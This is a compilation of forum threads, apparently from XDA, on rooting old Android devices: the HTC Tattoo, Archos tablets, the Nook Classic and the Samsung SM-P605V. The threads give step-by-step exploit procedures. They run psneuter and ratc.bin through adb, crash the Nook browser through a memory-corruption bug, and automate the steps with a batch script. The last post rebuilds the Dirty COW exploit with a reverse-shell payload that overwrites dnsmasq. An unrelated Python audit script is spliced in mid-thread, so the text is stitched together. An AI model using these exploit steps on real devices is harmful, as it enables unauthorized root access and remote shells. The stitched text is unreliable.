question for romanian Tattoo users - Click General

hello!!
Is there someone that managed to obtain root access? If that's true, please tell me what method you used and how it went...

Root Access is quite easy to Achieve.
[GUIDE] All Tattoo questions and answers see here (from A to Z)!
http://forum.xda-developers.com/showthread.php?t=716282
1. How can I root my phone?
1.1 General information/Basic adb-commands
Rooting a phone enables you to do things, which normally aren't possible for the average user like:
- Removing apps which were preinstalled by the provider (like Orange, Vodafone, etc.). My Tattoo had Vodafone apps for buying music and other sh*t, which was installed on the system partition (to which a "normal" user has no rights to write to, including deleting).
The Tattoo was successfully rooted by a bunch of guys here, namely -bm-, mainfram3 and Coburn64 (maybe, I don't remember quite correctly ). Also the Tattoo was the first phone having a security mechanism hindering a user to mount the filesystems as read/write, which had to be overridden by remapping the read only memory region to a read/write one. This is done by the module Tattoo-hack.ko, also made by mainfram3. He also created the first boot.img, which enabled su directly from adb and loading Tattoo-hack directly from boot on.
A few words about adb:
ADB is a tool for communicating from the PC with the mobile phone. For this a service is running on the phone enabling the communication via Terminal Emulator. Here are the most useful adb-commands:
Code:
adb push localFileFromPC /path/on/mobilephone
-> pushes a file "localFileFromPC" to a specified location on the phone
adb pull /path/to/file pathFromPC
-> receives a file from the phone and stores it to "pathFromPC"
adb remount
-> This is only possible in custom ROMs, remounts the file system to r/w automatically
adb shell "command"
-> executes "command" and returns to the computer shell
adb shell
-> opens a shell session on the phone (from here on you have to be very careful! Also you can execute now normal linux commands like rm, mv, ls, chmod and so on, but not cp (this can be done through busybox)). You will have to use this more often, so get used to it ;)


[Q] tattoo rooting problem

I've tried to root my Tattoo, following a long tutorial in unlocker.
Applying it exactly didn't come with results;
even when goldcard my card I'm still getting that phone logo with upside down rectangle.
Any help or way to get latest RUU to update to Android 2.2?
[GUIDE] All Tattoo questions and answers see here (from A to Z)!
http://forum.xda-developers.com/showthread.php?t=716282
1. How can I root my phone?
1.1 General information/Basic adb-commands
Rooting a phone enables you to do things, which normally aren't possible for the average user like:
- Removing apps which were preinstalled by the provider (like Orange, Vodafone, etc.). My Tattoo had Vodafone apps for buying music and other sh*t, which was installed on the system partition (to which a "normal" user has no rights to write to, including deleting).
The Tattoo was successfully rooted by a bunch of guys here, namely -bm-, mainfram3 and Coburn64 (maybe, I don't remember quite correctly ). Also the Tattoo was the first phone having a security mechanism hindering a user to mount the filesystems as read/write, which had to be overridden by remapping the read only memory region to a read/write one. This is done by the module Tattoo-hack.ko, also made by mainfram3. He also created the first boot.img, which enabled su directly from adb and loading Tattoo-hack directly from boot on.
A few words about adb:
ADB is a tool for communicating from the PC with the mobile phone. For this a service is running on the phone enabling the communication via Terminal Emulator. Here are the most useful adb-commands:
adb push localFileFromPC /path/on/mobilephone
-> pushes a file "localFileFromPC" to a specified location on the phone
adb pull /path/to/file pathFromPC
-> receives a file from the phone and stores it to "pathFromPC"
adb remount
-> This is only possible in custom ROMs, remounts the file system to r/w automatically
adb shell "command"
-> executes "command" and returns to the computer shell
adb shell
-> opens a shell session on the phone (from here on you have to be very careful! Also you can execute now normal linux commands like rm, mv, ls, chmod and so on, but not cp (this can be done through busybox)). You will have to use this more often, so get used to it

Temp root on 2.3.20 firmware

It's not pretty, but I managed to get the exploit used by Archangel to work on the 2.3.20 firmware. Hopefully someone can think of something to automate this process, or knows of a better way to do this.
I believe what Archos is doing is simply restricting your ability to execute the Archangel application in the required directories, with the addition of the psneuter exploit, you can get around this.
This exploit requires that you have ADB setup, the Archangel APK, and the psneuter exploit.
Create a folder on your computer titled archosroot (or anything you would like)
Download Archangel from http://forum.xda-developers.com/showthread.php?t=928767 rename the apk to zip and extract the files.
From the extracted files navigate to "res" then to "raw"
In this folder copy "ls" and "su" to your "archosroot" folder
Download psneuter from http://www.thinkthinkdo.com/trac/project1/attachment/wiki/psneuter/psneuter.zip and extract the files.
Copy the extracted psneuter to your "archosroot" folder.
Enable USB Debugging on your Archos, and connect it to your computer with USB.
From a command prompt, navigate to the directory ADB is installed in.
Verify that the device is connected by running
adb devices
Your archos should be listed, if not please refer to the forum on how to setup ADB for the archos
Once your archos is detected run the following commands.
adb push pathto\archosroot\psneuter /data/local/tmp
(replace pathto with the location your archosroot folder is in, for example c:\archosroot\psneuter)
adb shell chmod 777 /data/local/tmp/psneuter
adb shell /data/local/tmp/psneuter
This may take a few moments
Copy ls and su to your sdcard
adb push pathto\archosroot\ls /sdcard
adb push pathto\archosroot\su /sdcard
Connect to the shell
adb shell
move ls and su to /tmp
mv /sdcard/ls /tmp/
mv /sdcard/su /tmp/
Execute the ls exploit
/tmp/ls 0x62c7a315 0x260de680
Install the superuser application from the market (if you don't already have it)
You should now be able to run su to get root access from a terminal.
Note 1: I was previously rooted with archangel so I already had these files, I have not tried without the files being installed at all, however since this is only a temp root, the process should be the same.
Note 2: I was not able to get Titanium Backup to work, it could be the psneuter exploit prevents the application from properly requesting the right permissions.
This is good, but you should post this in the developer sub-forum
it's too hard to do this for beginners
Thanks! It's very simple instruction, will try it today. As easy as install Urukdroid.
I postponed to upgrade to 2.3.20 just due to lack of root method without SDK.
I need the root just for copy some scripts to \system\bin
this has already been done in the following thread with perm root.
http://forum.xda-developers.com/showthread.php?t=897877
Firmwares have already been made that include overclock as well, the first post reveals all.
cool.
the_Danzilla , the way you pointed to requires SDE installation. I don't want to use SDE.
Inciner8Fire said:
Download psneuter from http://www.thinkthinkdo.com/trac/project1/attachment/wiki/psneuter/psneuter.zip and extract the files.
Copy the extracted psneuter to your "archosroot" folder.
Enable USB Debugging on your Archos, and connect it to your computer with USB.
From a command prompt, navigate to the directory ADB is installed in.
Verify that the device is connected by running
adb devices
Your archos should be listed, if not please refer to the forum on how to setup ADB for the archos
Once your archos is detected run the following commands.
adb push pathto\archosroot\psneuter /data/local/tmp
(replace pathto with the location your archosroot folder is in, for example c:\archosroot\psneuter)
adb shell chmod 777 /data/local/tmp/psneuter
adb shell /data/local/tmp/psneuter
From what I can read psneuter is a root exploit for the adbd service. So you don't need archangel to complete the root.
Can you verify what user adbd is running after you execute psneuter.
adb shell whoami
The other thing that is mentioned in the first lines of the source code of psneuter is that it effectively disables reading the settings. This will probably affect a lot of programs and probably is the reason Titanium backup is not working. So this method is effectively useless to have a working root.
wdl1908 said:
From what I can read psneuter is a root exploit for the adbd service. So you don't need archangel to complete the root.
Can you verify what user adbd is running after you execute psneuter.
adb shell whoami
The other thing that is mentioned in the first lines of the source code of psneuter is that it effectively disables reading the settings. This will probably affect a lot of programs and probably is the reason Titanium backup is not working. So this method is effectively useless to have a working root.
I was doing some more looking and you are right that because of breaking the settings this is not a good long term root.
However I would not call it useless, since you should be able to manually back up an application.
Perhaps the property file that this setting is in can be modified with this, so that it can be rooted using a more standard method.
Not sure what I did, but I was able to get root with the properties intact.
My archos had frozen today and I was forced to power it off so I know the properties would no longer be neutered. I was looking at some of the properties files and for the heck of it I tried running su from a terminal, and it worked.
I opened Titanium backup and it prompted for root permissions.
Perhaps something about the forced power cycle?
I found out that when I connect to a wireless network (as required by archangel) if the disable network shares option is chosen it's not possible to root.
However it would appear that if you connect and don't select this option Archangel will still work.
I suppose there could be something else I did without realizing it, but this has worked after rebooting 5 times so far.

[Q] Rooting Nook Classic (Nook First Edition)

I know that this is for second edition but I don't see a forum for the first edition so this seems to be the closest match. Anyway I am trying to root my Nook Classic (the one with an E-ink display on the top and color touch screen on the bottom). I am following the instructions on nookdevs for rooting the Nook Classic on all hardware and firmware versions (I can't post the link here as I am new but PM me and I can pass it that way if you need). The method is that sometimes when the web browser browses a certain type of website it crashes and sometimes starts adbd and you can connect adb at that point.
I have managed to get adb to connect, pull the init.rc file, make the needed change, but when I try to push the ratc.bin file adb says it goes through but then the second command $ cd /sqlite_stmt_journals (after starting adb shell) says it is not found. So I can't go any further. ratc.bin is what gives root access long enough to push the init.rc back and without being able to run that, well I am up a creek.
Any ideas?
dob43 said:
I know that this is for second edition but I don't see a forum for the first edition so this seems to be the closest match. Anyway I am trying to root my Nook Classic (the one with an E-ink display on the top and color touch screen on the bottom). I am following the instructions on nookdevs for rooting the Nook Classic on all hardware and firmware versions (I can't post the link here as I am new but PM me and I can pass it that way if you need). The method is that sometimes when the web browser browses a certain type of website it crashes and sometimes starts adbd and you can connect adb at that point.
I have managed to get adb to connect, pull the init.rc file, make the needed change, but when I try to push the ratc.bin file adb says it goes through but then the second command $ cd /sqlite_stmt_journals (after starting adb shell) says it is not found. So I can't go any further. ratc.bin is what gives root access long enough to push the init.rc back and without being able to run that, well I am up a creek.
Any ideas?
>> http://www.mobileread.com/forums/forumdisplay.php?f=209
>> http://www.the-ebook.org/forum/viewforum.php?f=44&sid=e250da1c3a4967da22dae8ca2d104ac8
Thanks osowiecki, I did find a thread on Mobile read shortly after I posted this. The other is non-english I am afraid, and sadly I only speak english.
Anyway I did manage to root my nook today. And I am posting here as I hope it will help someone in the future:
Yessssssssssssssss! I finally hacked my Nook Classic (Nook First Edition called by some)! I followed most of the instructions at http://nookdevs.com/Rooting_B&N_revision_1.4_to_1.7_on_any_hardware
I only tweaked in a few places. Here is a general list of what I did:
1. Look at the site above and grab the linked file (ratc.bin). Then go to this thread http://forum.xda-developers.com/showthread.php?t=1474956 and at the top there grab the adb + fasboot + drivers.zip. The reason I used this is because it is much smaller than the full Android SDK (which is over 500mb btw) and I figured this would work since it works for Nook Tablets. I didn't install the drivers or anything though. Just used adb.
2. Went with nook browser to http://nookadb.suspended-chord.info/ to crash the browser. If this should ever be down I see on the nookdevs page there is a discussion with the code that is on the crash page so you can put it on any web server and still do this procedure.
3. Once it crashed I went to cmd (command prompt) and navigated to the folder that had the adb package I downloaded and decompressed earlier. I suggest putting this folder on your desktop for easy use. I gave the command
adb connect yournookip:5555
Please note that the nookdevs instructions are not specific in that you NEED the :5555 after the IP. If it doesn't connect, keep crashing the browser by going to that page until it connects.
4. Extracted the init.rc file with the command
adb pull /init.rc
then edited as per the instructions on nookdevs.
5. Now here is where things are different. I tried to push the ratc.bin file and while that seemed to work the commands after it didn't. It would keep saying the file wasn't there. I was cut and pasting the commands direct from the website so I don't think that was the issue. So what I did was grab the bat file at www.mobileread.com/forums/showthread.php?t=121655&page=2 by Jackr and edit it slightly removing the bit about location of adb and placed the bat in the same folder as adb on my desktop and ran it.
6. This actually worked and the bat prompted me to crash the browser again. I kept trying, it took a while, but as soon as I did it pushed the modified init.rc to the nook. This is another reason why I think the bat/script is important, as my nook totally froze a second after I crashed it. I think that if I was trying to paste that command manually after connecting I would still be trying lol.
7. After reboot I was fully rooted and I installed a bunch of apps from nookdevs using adb. Just make sure the apk (app file) is in the same directory as adb and use the command install nameofapp.apk
8. If you want to use nookmarket app to install files by itself then you need to:
adb connect nookIP:5555
adb shell
then type this after the #
/system/xbin/sqlite3 /data/data/com.android.providers.settings/databases/settings.db "update secure set value=1 where name='install_non_market_apps'"
It will allow nookmarket to install apps on the fly over the net. If you ever want to turn it back off just change the value=1 to value=0 in the above command. Of course you can always use adb, but it can be handy.
Of all the apps I would definitely suggest NookLibrary and wifilocker along with Nooksync. There are several other good nook apps such as Trook. Oh I should also mention that Nook Browser still works fine. I think using the batfile/script helped with that situation.
I hope this helps someone who is thinking of taking the plunge (and trying to find out HOW). I wouldn't have bothered if B&N actually continued to update the Nook Classic and add the features that we BEGGED for (and are in NookLibrary). Instead of spending time adding things we didn't like games.
I've tried a thousand times, but always get "failed to copy 'init.rc' to '//init.rc': Permission denied" so RATC must not be working. And I'm on mac, so no bat. Any ideas?
lolbutts said:
I've tried a thousand times, but always get "failed to copy 'init.rc' to '//init.rc': Permission denied" so RATC must not be working. And I'm on mac, so no bat. Any ideas?
I would suggest looking at the bat, and creating the equivalent in apple script. If I remember right Mac's still have that option. Another option would be to run say WinXP in emulation (with virtual box for example) and do it that way.
How to root the original Nook tablet (model number: BNRZ100)
dob43 said:
Yessssssssssssssss! I finally hacked my Nook Classic (Nook First Edition called by some)! I followed most of the instructions at http://nookdevs.com/Rooting_B&N_revision_1.4_to_1.7_on_any_hardware
Okay, since nookdevs.com has apparently been down for sometime now, I was checking out the mobileread.com link that was shared above and found out the info that I have been searching for to find out how to root the Nook. Be forewarned that I have not tried this yet, but I am about to, and afterwards I will post the results, I am just posting it as sort-of a guide for myself and anyone interested at this point. I will edit this post accordingly once I am successfully rooted.. Please see below for links / details.
Disclaimer: I am not responsible for any damage that is done by you to your Nook, either physically or otherwise. I am just showing you what I have researched and if you choose to follow these directions it is at your own risk.
Which Nook Device Do You Have?
click here to find out:
http://glyde.com/glydecast/how-to/which-nook-do-you-have/
Remember, this is for the first generation only (model number: BNRZ100)
Here is a visual aid that will help you find the SD card that you need to look for once you get the Nook opened up (yes, you will need to open your Nook and access the motherboard):
http://www.wired.com/2009/12/nook-torn-open-hacked-and-rooted/
How to open the Nook up:
https://www.youtube.com/watch?v=GEDqiNiQFHk
Hint: you don't need to take to front panel / bezel off, just the back section because all we need is access to the motherboard to be able to remove the internal SD card, which contains the file that we will be editing.
Finally, the info that you need to root the device (also posted below the link for quick reference, and just in case the link gets broken):
http://www.mobileread.com/forums/showthread.php?t=128210
How to root the Nook, after you figure out how to open it up:
Just you need a microSD Card reader + Linux (any linux ) !
just you should remove the System file MicroSD ( which is inside the Nook )
put it in your PC , change the "init" file with Any txt editor !
just find "service adbd /sbin/adbd" and change the "disable" to "enable" ...
you are done !
Wow I had no idea that Nookdevs went down. Thankfully I did archive all the information on that page. While the method you mentioned is great, and the best, only the earliest nook classic's had removable system SD cards. After the first batch they were soldered chips instead.
With that in mind I am posting what was contained in the link I posted before on NookDevs since it is not available on the internet archive.
------------
This method of rooting is known to work on B&N firmware revisions 1.4-1.7, on all hardware versions. Unlike the other rooting methods, this one involves an element of luck -- it takes advantage of a memory-corrupting bug in the web browser, and its success depends on the current contents of the memory which depends on more variables than we can control. As such, the method requires a little bit of (or more) patience. Warning: After this root is completed, the web browser will be irreversibly damaged.
Contents
1 Preparation
2 Enable adbd on the Nook
3 Pull and modify /init.rc
4 Getting root access
4.1 Keeping root access
5 Your rooted Nook
6 Notes
Preparation
Install Google's Android platform tools from developerdotandroiddotcom. These include many useful utilities, such as the ADB control software.
Open up a terminal to use ADB
Open a command prompt
Navigate to the directory that you installed, then go into the platform-tools subdirectory. This is where the adb executable lives.
Connect your nook to the same WiFi that your computer is on. You need direct (non-firewalled) access to the Nook's IP address to connect via ADB.
Find your Nook's IP address (How to find out your nook's IP address)
Write it down somewhere.
Enable adbd on the Nook
This is the luck portion of the root. adbd is the other half of ADB: ADB runs on your computer, and tries to connect with adbd on the nook. Once connected, you can issue commands, shuffle files, and install applications. Our final goal is to be able to start and stop adbd at will[1].
Open the Nook's web browser and navigate to the web site nookadb.suspended-chord.info. You may want to bookmark the page for a quicker access.
When you load this web page, the browser will crash. (It may automatically reload itself a few times first.) After it crashes, it might enable adbd.
Go back to the command prompt on your computer, and type:
adb connect <nook's IP>
One of two things will happen:
You will get the message unable to connect to <ip address>:5555.
In this case, restart your web browser and load the web page again (from the history or the bookmark). You may have to do this a dozen times or more, so keep at it!
You will get the message connected to <ip address>:5555.
Success!
At this point you have (temporary) access to the nook via ADB, can now enter commands on your PC for the Nook, and can move files back and forth. If you reboot the nook, adbd (the nook companion to ADB) will not be running.
Pull and modify /init.rc
If this isn't your first time through, and you have a modified copy of init.rc, skip this step.
Now that you can connect into the Nook, you will want to pull and edit the /init.rc file. This file is run when the nook turns on, and includes an option to enable adbd (disabled by default). Download the file to your PC with:
adb pull /init.rc
Open this file with Notepad (or a different plain text editor), and find the lines:
service adbd /sbin/adbd
disabled
Change 'disabled' to 'enabled' and save the file.
Getting root access
You got the web browser to launch adbd, but you only have the privilege level of the web browser's user - system. To install software and to start adbd when the Nook reboots, you need root access. Rage Against the Cage will give you root access. Next, you'll restart adbd, and push the modified init.rc back to the nook. After that, reboot the nook and you're done!
Download [ratc.zip].
Extract it to the same directory that adb is stored in, then go back to the command prompt:
adb push ratc.bin /sqlite_stmt_journals
adb shell
$ cd /sqlite_stmt_journals
$ /system/bin/chmod 777 ./ratc.bin
$ ./ratc.bin
(several lines of output follow -- don't do anything, a few seconds later adb will disconnect you.)
Keeping root access
If everything went well, you should have root access on the Nook. However, the Nook is now relatively unstable and may stop working at any point, so work quickly!
The nook may crash - just reboot, then restart the process from scratch. (Remember, you don't need to pull init.rc again.)
First, you need to stop your PC's ADB server. It still thinks that it's connected to the nook.
adb kill-server
Second, you need to re-establish the connection with adbd on the nook and then push init.rc file. You can do this by typing these commands[2]:
adb connect <nook IP>
adb push init.rc /
Perform the browser crash procedure again. After each attempt, check if the computer successfully transferred init.rc. If it did, you're done!
If the nook crashes before the transfer completes (so you are not able to connect to your nook), go back to "Enabling adbd on the Nook". You can skip "Pull and modify /init.rc", but do the other steps.
If the adb push gives a permission denied error, redo the "Getting root access", and try again. You may have to do this quite a few times until the whole process succeeds.
Your rooted Nook
Assuming everything worked, you now have a rooted Nook with adbd running on reboot, with root access. You should be able to establish the connection with adbd on the nook without jumping through any other hoops.
What's next? Browse the applications, and install to your heart's content.
Suggestions:
Mynook.ru Launcher A polished replacement launcher. You must replace the launcher to access additional applications with the nook.
Trook A RSS feed reader for the nook, and much more! It can install applications, too. Just go into the nookdevs feed.
NookLibrary A replacement library for the nook. It unifies sideloaded books with Barnes & Noble content, and offers other improvements.
NookMarket A program that allows you to easily install everything on nookdevs. Trook offers more functionality (imho)
Games There are a few games on the applications page.
Notes
↑ There's also a Python script to automate the process: root-nook-eink.tar.xz (Updated Jun 6 , 2011)
↑ You may want to run a script that automatically issues the following commands, reducing the chances of the nook crashing before init.rc has been pushed to it. In this case, extract this [batch file] to the same directory as ADB. Run it by typing:
push.bat
It will prompt you for your nook's IP address, then try connecting. Every few seconds, ADB will complain that it can't connect to the nook. Let's fix that.
------------------------------------------------
The above is from Nookdevs.com and I did not write it. I am only posting it here as the site has gone down.
I am also posting the html file that is needed to do this (although here it is in txt format). If the site listed above ever dies you can put this on a website somewhere to use it. And the ratc.bin file needed.
And finally I am adding the apps that make rooting the nook classic worth while. The improved library definitely. Which btw are two parts, the library app and the nooksync which enables you to download from B&N directly. Otherwise you need to use the normal nook library app to download then you can read with the nookdev version. I am not sure which version of the library works best, been a while since I installed it so I included both.
Also wifilocker is great to turn wifi on/off, not to mention lock it and keep the nook from going to sleep while you are connected to adb. I definitely suggest installing that as well. The others are handy. Trook can connect to calibre and download books from your desktop. The nook browser is an improved web browser for nook classic, although I never really bothered with it.
Nook notes is good for quick little notes when you don't have any other device handy. Txt reader reads txt files, not the best but it is handy. Personally I just make epubs of anything with calibre. But if you don't want to bother making an epub first, this is handy.
Hope this helps someone!
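Both methods in this thread come down to one change in init.rc: the `disabled` line under `service adbd /sbin/adbd`. The following is an added example, not code from the posts above or from nookdevs: a small Python audit that parses an init.rc, reports whether adbd starts at boot, and compares a pulled file against a known-good copy. The sample file contents and the function names are constructed for illustration.

```python
"""Audit an Android init.rc: which services start at boot, and is adbd one of them?"""

# Constructed sample in the Android init language, not taken from a real device.
# The adbd entry mirrors the two lines quoted in the thread.
SAMPLE_STOCK = """\
on boot
    setprop service.adb.tcp.port 5555
    class_start default

service servicemanager /system/bin/servicemanager
    user system
    critical

service adbd /sbin/adbd
    disabled

service installd /system/bin/installd
    socket installd stream 600 system system
"""
# The same file after the edit the thread describes ("disabled" -> "enabled").
SAMPLE_EDITED = SAMPLE_STOCK.replace("    disabled\n", "    enabled\n")


def logical_lines(text):
    """Yield (first_line_number, tokens); skips blanks/comments, joins backslash folds."""
    pending, start = "", None
    for number, raw in enumerate(text.splitlines(), 1):
        if start is None:
            start = number
        line = raw.strip()
        if line.endswith("\\"):          # line folding: continue on the next line
            pending += line[:-1] + " "
            continue
        line, pending = (pending + line).strip(), ""
        first, start = start, None
        if line and not line.startswith("#"):
            yield first, line.split()


def parse_init_rc(text):
    """Return (services, props): service sections and setprop commands in action sections."""
    services, props, current = [], [], None
    for lineno, tok in logical_lines(text):
        if tok[0] == "service":
            current = None
            if len(tok) >= 3:
                current = {"name": tok[1], "exec": tok[2], "options": [], "line": lineno}
                services.append(current)
        elif tok[0] == "on":             # an action section ends the service section
            current = None
        elif current is not None:        # option line of the current service
            current["options"].append(tok)
        elif tok[0] == "setprop" and len(tok) >= 3:
            props.append((lineno, tok[1], tok[2]))
    return services, props


def service_states(text):
    """Map service name -> autostart flag, effective user, executable and line number."""
    states = {}
    for svc in parse_init_rc(text)[0]:
        opts = {o[0]: o[1:] for o in svc["options"]}
        states[svc["name"]] = {
            # init starts a service with its class unless it carries "disabled".
            # Only the absence of that word is checked; other options are not validated.
            "autostart": "disabled" not in opts,
            "user": (opts.get("user") or ["root"])[0],   # no "user" option: runs as root
            "exec": svc["exec"],
            "line": svc["line"],
        }
    return states


def audit(text):
    """Return findings as (code, line, detail) tuples."""
    findings = []
    for lineno, key, value in parse_init_rc(text)[1]:
        if key in ("service.adb.tcp.port", "persist.adb.tcp.port"):
            findings.append(("adb-tcp-port", lineno, f"adbd told to listen on TCP port {value}"))
    for name, st in service_states(text).items():
        if (name == "adbd" or st["exec"].endswith("/adbd")) and st["autostart"]:
            findings.append(("adbd-autostart", st["line"],
                             f"{name} starts at boot as user {st['user']}"))
    return findings


def changed_autostart(before, after):
    """List (name, was_autostart, is_autostart) for services whose boot behaviour differs."""
    old, new = service_states(before), service_states(after)
    return sorted((n, old[n]["autostart"] if n in old else None, s["autostart"])
                  for n, s in new.items()
                  if n not in old or old[n]["autostart"] != s["autostart"])


if __name__ == "__main__":
    for code, line, detail in audit(SAMPLE_EDITED):
        print(f"line {line}: [{code}] {detail}")
    print(changed_autostart(SAMPLE_STOCK, SAMPLE_EDITED))
```

Run against a file obtained with `adb pull /init.rc`, `audit()` shows at a glance whether a device will expose adbd after every reboot, and `changed_autostart()` shows what differs from a stock copy.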
I downloaded files and rat.bin has malware in it.
I also have a hard time understanding the ones that are explained above. Is there any easier way to do it? Does anybody have a good tutorial video or "fool-proof" instruction on this? I have Nook classic wifi version.
I would like to read kindle books on nook as well as the nook books. Is this even possible on this model?
Thanks for the help
kidollt said:
I downloaded files and rat.bin has malware in it.
I also have a hard time understanding the ones that are explained above. Is there any easier way to do it? Does anybody have a good tutorial video or "fool-proof" instruction on this? I have Nook classic wifi version.
I would like to read kindle books on nook as well as the nook books. Is this even possible on this model?
Thanks for the help
Er of course rat.bin would be flagged as malware, because technically it is. You are hacking a system that is designed not to let you in. But in this case all rat.bin will do is let you in so you can get root of your own device, nothing else. No back doors for anyone else or making your device do odd things.
The problem you are having is not using rat.bin, without that you might as well not try. I also only managed to do it with a BAT file so that it would keep trying to push the init.rc RIGHT AFTER the rat.bin was used. Generally you can't type fast enough to do the push. The window of opportunity is very very small.
This does work but is tricky as the window of opportunity is very small. I tried for hours trying to get it to work, then I used the BAT file to make the push automatic and on the second try it worked. Rooting the Nook Classic is the toughest device to root that B&N made. If you have one of the really early models that has a removable internal SD card then you can pull that, make modifications (install an old version of the ROM, make a modification to init.rc), and reinstall the SD card. I forget the serial numbers of the models that this worked with, but I do know it was the first batch of Nooks B&N made. If you got yours after the first Christmas, then it is likely it doesn't have an internal SD card that you can remove. Later on they soldered them to the board.
As for reading kindle books, no. There isn't a mobi reading app that I have found, let alone kindle books with DRM. The better bet is to use Calibre calibre-ebook.com to convert your kindle books to epub. But they can't be encrypted/DRM. If they are, then you have to remove that. There are scripts for Calibre that can do it for nook and kindle. I use calibre to convert my mobi/kindle books to epub then side load them. Another benefit of rooting a nook classic, you can then browse and download wireless from your calibre library with the Trook app. Although I never bothered and just did the transfers via USB.
Hi!
I would like to ask for help in this case:
I followed all the instructions here, however for some reasons I wanted to install this app first using the command "adb push Home.apk /system/app" pushing the app found here: Github
Now it turns on/off, shows "Home", battery and time at the top bar, but everything else is black, both the Eink screen and the touchscreen as well.
It does not connect to wifi automatically so I can't connect via ADB to switch back to the original Home apk
Please help me, what should I do?
Is 1.7 software not rootable?
I can't get adb to come on, no matter how many browser crashes I do. Even wrote a script for it:
@echo off & setlocal
set IP=192.168.0.119
set loopcount=0
set s
:loop
set /a loopcount=loopcount+1
echo Connecting %loopcount% time...
adb connect %IP% | find /i "connected to" > %s
if errorlevel 1 (
echo Not successful + %ERRORLEVEL% + %s%
goto loop
) else (
echo Successful + %ERRORLEVEL% + %s%
adb shell
goto exitloop
)
:exitloop
pause
Is OTA rooting (by redirect on sync.barnesandnoble.com) not possible any longer as well?
Sorry for the late response, for some reason the email telling me there was a post here just arrived TODAY lol.
It should be, I did it with 1.7. The script I have I modded a little from another one I found online; here is mine:
Code:
@echo off
echo The website hack seems to work on the round right after it has an instant crash.
echo.
adb kill-server
adb start-server
set /p ip=Enter the IP here.
:CON
cls
echo Crash the browser.
echo.
adb connect %ip%
for /f "tokens=2" %%A in ('adb devices') Do (Set dev=%%A)
if %dev%==device goto INT
echo.
goto CON
:INT
if exist ratc.bin (set f1=1) else (set f1=0)
if exist init.rc (set f2=1) else (set f2=0)
if %f1%==%f2% (if %f1%==1 (goto RTT) else (goto 2fi)) else (goto 2fi)
:2fi
if %f1%==0 (echo "The ratc.bin file is not in the %cd% directory.") else (echo Ratc.bin file present.)
echo.
if %f2%==0 (echo "The init.rc file has not been pulled from the device to the %cd% directory, pulling now.") else (echo Init.rc file present.)
if %f2%==0 adb pull /init.rc
echo.
echo Please add the required files and restart this batch. If init.rc was just pulled, you will need to modify the file.
cmd
:RTT
adb push ratc.bin /sqlite_stmt_journals
adb shell cd /sqlite_stmt_journals
adb shell /system/bin/chmod 0777 /sqlite_stmt_journals/ratc.bin
adb shell /sqlite_stmt_journals/ratc.bin
adb kill-server
adb start-server
goto CO2
:CO2
cls
echo Re-crash the browser.
echo.
adb connect %ip%
for /f "tokens=2" %%A in ('adb devices') Do (Set dev=%%A)
if %dev%==device goto PSH
echo.
goto CO2
:PSH
adb push init.rc /
adb shell reboot
echo.
echo Congrats! The device is now rooted.
echo.
cmd
It is RANDOM on the browser crashes. Sometimes it happens fast, another time it took me an hour or two to get a good crash and root the nook. Also if it doesn't seem to be doing it for a long time, try rebooting the nook (hold down the power until the screen blanks then press the button again to restart it). In my opinion, this is the toughest Nook to root, but definitely worth it. Especially now that B&N ended support some time ago. Also make sure the ADB, this script, and the ratc.bin are in the same folder. I used a folder on the desktop as it made it much easier/faster to get to. Also after you get the init.rc and modded, that should be in the same folder as well.
As for OTA rooting, I have no idea if it will work or not. I never used that method. But if it depended on any sort of connection from B&N, I doubt it will work now since they have abandoned the Nook classic.
If you need any of the nook apps that were on the nook developer site let me know. I downloaded all the apps before the site went down.
Does this still work? I recently dug up my old nook 1st edition, I tried the website and it didn't crash my browser, it just sat there forever loading.. I looked at the site, now it's using TLS 1.3, but old nook 1st edition is stuck with TLS 1.2... I tried for many hours just couldn't "crash" the web browser at all...

Fake 'su' using service started through adb shell

Many of the root tools/apps such as screencast, Helium... allow an option to start a background service through adb shell, and then connect to this service to execute commands with elevated permissions.
My idea is around generalizing this experience. There is only one app that starts a background service and acts as a proxy for all other apps (like the SuperSu app).
To make this interaction compatible with all root apps, I was thinking of writing a shell script "su" which redirects all the arguments to the above service.
This will give users with non-rooted devices access to many of the root apps.
But this will require the "su" script to be in the $PATH directory.
[Q] Is there a way to change the $PATH variable from adb shell (without root) so that it is retained system-wide? Any alternatives?

[SM-P605V] Verizon Temporary Root & Bootloader Unlock Research

Further research proves this has been done before, although perhaps not on our device. While root in a technical sense, it's severely SElinux-limited & thus not of significant utility as it is. I've made some inroads re. patching init going toward full root, but nothing certain yet. Either way, what exists should be enough to get us to an unlocked bootloader if we can get our hands on the right CID & aboot.
------
This is how I achieved temproot on the P605V. This is not a permanent root as, since our tablets run a Samsung eMMC and are/should be vulnerable to the eMMC bug, if we have the right CID and aboot & if my understanding is correct, we can convert these to developer units and unlock their bootloader!
What this basically does is downgrade to a dirtycow-vulnerable kernel & launch a temporary root shell. At the moment it can't do much as it runs within dnsmasq's SElinux context, but it's a start.
This does not apply if you're on 4.4.2, there are probably better rooting methods then. Do not upgrade to 5.1.1 in that case as you will burn fuses and will be unable to downgrade back to 4.4.2.
However, we can still crossflash between 5.1.1 versions! For our tablet, there are two: P605VVRSDPL1 (latest, patched) and P605VVRUDOH2 (earlier, unpatched). You must downgrade to P605VVRUDOH2. You will need the P605VVRUDOH2 tar.md5 and Odin - this is covered extensively for every Samsung device (including the non-VZW version of ours) so I will not repeat it here.
Once you're on P605VVRUDOH2, go through the initial setup, enable Developer Tools, then enable ADB.
The manual process (compiling from source):
You will need to obtain the following (on Linux, not tested on Windows):
- the Android 22 NDK
- https://github.com/timwr/CVE-2016-5195
- https://github.com/freddierice/trident
0. If you don't yet have it installed, install the Android NDK. I don't usually compile for Android, so I installed Android Studio from https://developer.android.com/studio/#downloads and added NDK 22 from its menus. You can likely (and perhaps should) use an earlier NDK, such as 14 or 15. Your mileage may vary.
1. Extract CVE-2016-5195 and trident
2. In CVE-2016-5195, rename 'run-as.c' to 'old-run-as.c'
3. Copy 'reverse.c' from trident into CVE-2016-5195
4. In CVE-2016-5195, rename the copied 'reverse.c' to 'run-as.c' - we're basically replacing the original payload from CVE-2016-5195 with a reverse shell from trident
5. Edit the Makefile and replace the 'root: push' section as follows:
root: push
	adb shell 'chmod 777 /data/local/tmp/dcow'
	adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
	adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/dnsmasq'
6. Run 'make root'
7. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIM card to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq runs as root, our shell will run as root as well!
